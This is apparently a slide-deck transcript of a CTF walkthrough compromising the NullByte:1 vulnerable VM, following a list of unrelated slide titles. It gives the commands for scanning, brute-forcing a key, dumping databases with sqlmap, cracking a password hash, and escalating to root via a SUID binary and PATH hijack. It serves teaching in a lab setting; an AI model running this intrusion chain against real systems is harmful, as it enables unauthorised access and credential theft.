Heap, Types of Heap, Insertion and Deletion
Jaydeep Kale
 
Q1 2025 Dropbox Earnings and Investor Presentation
Q1 2025 Dropbox Earnings and Investor PresentationQ1 2025 Dropbox Earnings and Investor Presentation
Q1 2025 Dropbox Earnings and Investor Presentation
Dropbox
 
Build Your Own Copilot & Agents For Devs
Build Your Own Copilot & Agents For DevsBuild Your Own Copilot & Agents For Devs
Build Your Own Copilot & Agents For Devs
Brian McKeiver
 
Greenhouse_Monitoring_Presentation.pptx.
Greenhouse_Monitoring_Presentation.pptx.Greenhouse_Monitoring_Presentation.pptx.
Greenhouse_Monitoring_Presentation.pptx.
hpbmnnxrvb
 
Vaibhav Gupta BAML: AI work flows without Hallucinations
Vaibhav Gupta BAML: AI work flows without HallucinationsVaibhav Gupta BAML: AI work flows without Hallucinations
Vaibhav Gupta BAML: AI work flows without Hallucinations
john409870
 
tecnologias de las primeras civilizaciones.pdf
tecnologias de las primeras civilizaciones.pdftecnologias de las primeras civilizaciones.pdf
tecnologias de las primeras civilizaciones.pdf
fjgm517
 
Ad

Exploiting null byte vm

  • 1. EXPLOITING NULL BYTE VM (CTF CHALLENGE) BY DEVANSH DUBEY DATE:21 April 2019
  • 2. ABOUT ME  Devansh Dubey  Volunteer at NULL Bhopal  Undergoing graduation from UIT RGPV  Cyber Security enthusiast  Twitter handle: @devanshdubey97
  • 3. About Null Byte VM • Name: NullByte: 1 • Codename: NB0x01 • Date release: 1 Aug 2015 • Author: ly0n • Series: NullByte • Web page: http://ly0n.me/2015/08/01/nullbyte-challenge-0x01/? • Download: ly0n.me/nullbyte/NullByte.ova.zip • Objective: Get to /root/proof.txt and follow the instructions. • Level: Basic to intermediate. • Description: Boot2root, box will get IP from dhcp, works fine with virtualbox & vmware. • Operating System: Linux
  • 4. Our Agenda: • Network Scanning (Nmap, netdiscover) • Exacting hidden text from an image obtained from IP(ExifTool) • Dictionary Attack using rockyou.txt(Burp suite) to obtain key. • Obtaining Database information via Sqlmap • Login to SSH on port 777 • Find SUID Binaries • Privilege Escalation by Manipulating $PATH • Get Root access and capture the flag(proof.txt)
  • 5. LETS BEGIN 1. Netdiscover: Netdiscover is an ARP scanner to scan for live hosts in a range of network. In the first step we will find the target. We will use netdiscover, which is command line tool in kali linux to find the target • Netdiscover –r 172.16.219.0/24
  • 6. NET DISCOVER RESULT Our target is 172.16.219.142. And now since we know our target, we will scan it using nmap
  • 7. 2. Nmap Scan • Our target is 172.16.219.142 ,we will scan it using nmap. • nmap -A 172.16.219.142 -A : For OS detection, version detection,script scanning,and traceroute. • Scanning the IP, we will know that the port number 80, 111, 777, 44607 are open and the service of SSH is forwarded from 22 to 777 port. Now we will try and open the targeted IP in the browser.
  • 9. 3. Exiftool: Here is an image and a quote on the page. We will find nothing on the page and page source. Hence data can be hidden . To see the hidden data we will use exiftool which is an open source tool available on github. Available on: https://github.com/exiftool/exiftool
  • 10. There you will find a comment kzMb5nVYJw. Now this might be a directory so lets open it on browser. On opening it, we will see a text field which require a KEY.
  • 12. 4. Dictionary Attack   • It is asking for a key, since it is a text field we will use the dictionary attack to find the key using BurpSuite and rockyou.txt. (rockyou.txt is an wordlist file available in /usr/share/wordlist directory).Through the dictionary attack, we will find the key i.e. elite.
  • 14. 5. Using Sqlmap : • Through the dictionary attack we will find the key i.e. elite. After entering the key in the text field, the new web page will get opened which will be asking for username, but till now we didn’t knew the username. So, we will find it in its Database using sqlmap.  • sqlmap -u http://172.16.219.142/kzMb5nVYJw/420search.php?usrtosearch=1 -- dbs –batch --batch: never ask for user input, use default behaviour. --dbs: databases
  • 15. It will give you the name of the database i.e. information_schema,mysql,performance_schema,seth.  
  • 16. 6. Now further we will find columns and tables and for that type: • sqlmap -u //172.16.219.142/kzMb5nVYJw/420search.php?usrtosearch=1 -D seth -- dump-all –batch • dump-all : dump all dbms databases entry. • Once command executes, it will show you the table name along with column and password as shown:
  • 17. Now we know username is ramses and password is in encrypted form .
  • 18. 7. Password decoding: • Now we have username and password but the password is encrypted, so we need to crack it and there are many online tools to do so. • First decrypt with base64 • $ echo “YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE=” | base64 –d • Then to crack it go to md5decoder.org and give the md5 value there and click on ok and it will show you the original word i.e. omega
  • 19. 8. Login through SSH Now we will SSH to log in and for that type: • ssh [email protected] -p 777 • After that give omega as the password. Once we login then by using the following command, we can enumerate all binaries having SUID permission. • find / -perm -u=s -type f 2>/dev/null • Here we found out that SUID bit enabled for /var/www/backup/procwatch
  • 21. 9. Privilege Escalation • cd /var/www/bakcup/ • ./procwatch Procwatch is security monitor written in Perl that watches a /proc filesystem for new processes. When a process is created, procwatch reports the time, the username, the PID, and the binary that was run. Its output is suitable for logging to log files and is geared for system administrators who are testing a new but as yet untrusted UNIX system. Procwatch is root owned that mean the file is running with root priviliges.
  • 22. 10. Privilege Escalation • echo "/bin/sh"  > ps • chmod 777 ps • echo $PATH • export PATH=.:$PATH • echo $PATH • ./procwatch • Due to ‘.’ in $PATH means that the user is able to execute binaries/scripts from the current directory. Hence now on executing id command we will find ourselves as root. • id • cd /root • ls • cat proof.txt
  • 24. REFERENCES • Website: http://ly0n.me/2015/08/01/nullbyte-challenge-0x01/ • Download: http://ly0n.me/nullbyte/NullByte.ova.zip • Download (Mirror): https://download.vulnhub.com/nullbyte/NullByte.ova.zip • Download (Torrent): https://download.vulnhub.com/nullbyte/NullByte.ova.zip.torrent    ( Magnet)? • https://github.com/Hamza-Megahed/CTFs/blob/master/NullByte/README • https://www.hackingarticles.in/hack-nullbyte-vm-ctf-challenge/ • https://resources.infosecinstitute.com/nullbyte-walkthrough/#gref • https://www.thegeekdiary.com/what-is-suid-sgid-and-sticky-bit/ • http://eng.omegaton.com/2017/04/null-byte-report.html